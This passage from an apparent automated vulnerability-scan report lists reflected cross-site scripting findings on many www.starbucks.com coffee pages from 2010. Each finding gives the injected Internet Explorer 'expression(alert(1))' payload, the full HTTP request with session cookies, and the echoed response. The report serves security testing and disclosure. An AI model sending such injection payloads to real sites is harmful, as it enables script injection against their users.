GET /coffee/learn/clover?20ec4"style%3d"x%3aexpression(alert(1))"ceb4d722147=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:04:15 GMT Connection: close Content-Length: 39114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/learn/clover?20ec4"style="x:expression(alert(1))"ceb4d722147=1"/> ...[SNIP]...
3.6. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/learn/flavors-in-your-cup
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5721b"style%3d"x%3aexpression(alert(1))"720e97e12cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5721b"style="x:expression(alert(1))"720e97e12cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/learn/flavors-in-your-cup?5721b"style%3d"x%3aexpression(alert(1))"720e97e12cf=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:03:56 GMT Connection: close Content-Length: 43928
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/learn/flavors-in-your-cup?5721b"style="x:expression(alert(1))"720e97e12cf=1"/> ...[SNIP]...
3.7. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84807"style%3d"x%3aexpression(alert(1))"1a579164fdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84807"style="x:expression(alert(1))"1a579164fdd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions?84807"style%3d"x%3aexpression(alert(1))"1a579164fdd=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:54:39 GMT Connection: close Content-Length: 52482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions?84807"style="x:expression(alert(1))"1a579164fdd=1"/> ...[SNIP]...
3.8. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions/caramel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72f92"style%3d"x%3aexpression(alert(1))"a4e88aeeae4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72f92"style="x:expression(alert(1))"a4e88aeeae4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions/caramel?72f92"style%3d"x%3aexpression(alert(1))"a4e88aeeae4=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:56:26 GMT Connection: close Content-Length: 42434
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel?72f92"style="x:expression(alert(1))"a4e88aeeae4=1"/> ...[SNIP]...
3.9. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions/cinnamon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96717"style%3d"x%3aexpression(alert(1))"9bd61317b0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 96717"style="x:expression(alert(1))"9bd61317b0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions/cinnamon?96717"style%3d"x%3aexpression(alert(1))"9bd61317b0b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:56:59 GMT Connection: close Content-Length: 42477
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon?96717"style="x:expression(alert(1))"9bd61317b0b=1"/> ...[SNIP]...
3.10. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions/savoring
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da712"style%3d"x%3aexpression(alert(1))"153353c2d05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da712"style="x:expression(alert(1))"153353c2d05 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions/savoring?da712"style%3d"x%3aexpression(alert(1))"153353c2d05=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:58:58 GMT Connection: close Content-Length: 41224
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring?da712"style="x:expression(alert(1))"153353c2d05=1"/> ...[SNIP]...
3.11. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-natural-fusions/vanilla
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b02"style%3d"x%3aexpression(alert(1))"11530d23784 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e0b02"style="x:expression(alert(1))"11530d23784 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-natural-fusions/vanilla?e0b02"style%3d"x%3aexpression(alert(1))"11530d23784=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:56:43 GMT Connection: close Content-Length: 42403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla?e0b02"style="x:expression(alert(1))"11530d23784=1"/> ...[SNIP]...
3.12. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-reserve-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c78ef"style%3d"x%3aexpression(alert(1))"30e6886810a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c78ef"style="x:expression(alert(1))"30e6886810a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee?c78ef"style%3d"x%3aexpression(alert(1))"30e6886810a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:57:03 GMT Connection: close Content-Length: 52822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee?c78ef"style="x:expression(alert(1))"30e6886810a=1"/> ...[SNIP]...
3.13. http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c317"style%3d"x%3aexpression(alert(1))"4e1c91bd61f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c317"style="x:expression(alert(1))"4e1c91bd61f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi?1c317"style%3d"x%3aexpression(alert(1))"4e1c91bd61f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:51:31 GMT Connection: close Content-Length: 42269
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi?1c317"style="x:expression(alert(1))"4e1c91bd61f=1"/> ...[SNIP]...
3.14. http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f782"style%3d"x%3aexpression(alert(1))"945e17cc48d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f782"style="x:expression(alert(1))"945e17cc48d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:30:14 GMT Content-Length: 41929
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry?9f782"style="x:expression(alert(1))"945e17cc48d=1"/> ...[SNIP]...
3.15. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6142"style%3d"x%3aexpression(alert(1))"e771ce6760f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6142"style="x:expression(alert(1))"e771ce6760f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?b6142"style%3d"x%3aexpression(alert(1))"e771ce6760f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:54:14 GMT Connection: close Content-Length: 43000
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?b6142"style="x:expression(alert(1))"e771ce6760f=1"/> ...[SNIP]...
3.16. http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2762f"style%3d"x%3aexpression(alert(1))"d1da931e99d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2762f"style="x:expression(alert(1))"d1da931e99d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/starbucks-reserve-coffee/nicaragua-corcasan?2762f"style%3d"x%3aexpression(alert(1))"d1da931e99d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:54:45 GMT Connection: close Content-Length: 42842
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan?2762f"style="x:expression(alert(1))"d1da931e99d=1"/> ...[SNIP]...
3.17. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/via
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 818c9"style%3d"x%3aexpression(alert(1))"3aaeb9fa4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 818c9"style="x:expression(alert(1))"3aaeb9fa4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/via?818c9"style%3d"x%3aexpression(alert(1))"3aaeb9fa4a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:56:49 GMT Connection: close Content-Length: 51777
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/via?818c9"style="x:expression(alert(1))"3aaeb9fa4a=1"/> ...[SNIP]...
3.18. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/via/flavored-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4285"style%3d"x%3aexpression(alert(1))"cebb7d2a308 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4285"style="x:expression(alert(1))"cebb7d2a308 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:37 GMT Content-Length: 53694
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/via/flavored-coffee?d4285"style="x:expression(alert(1))"cebb7d2a308=1"/> ...[SNIP]...
3.19. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/via/instant-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7511a"style%3d"x%3aexpression(alert(1))"c08da2b8d6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7511a"style="x:expression(alert(1))"c08da2b8d6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffee/via/instant-coffee?7511a"style%3d"x%3aexpression(alert(1))"c08da2b8d6b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:56:24 GMT Connection: close Content-Length: 53628
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffee/via/instant-coffee?7511a"style="x:expression(alert(1))"c08da2b8d6b=1"/> ...[SNIP]...
3.20. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffee/whole-bean-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32506"style%3d"x%3aexpression(alert(1))"0b3e0429598 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32506"style="x:expression(alert(1))"0b3e0429598 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
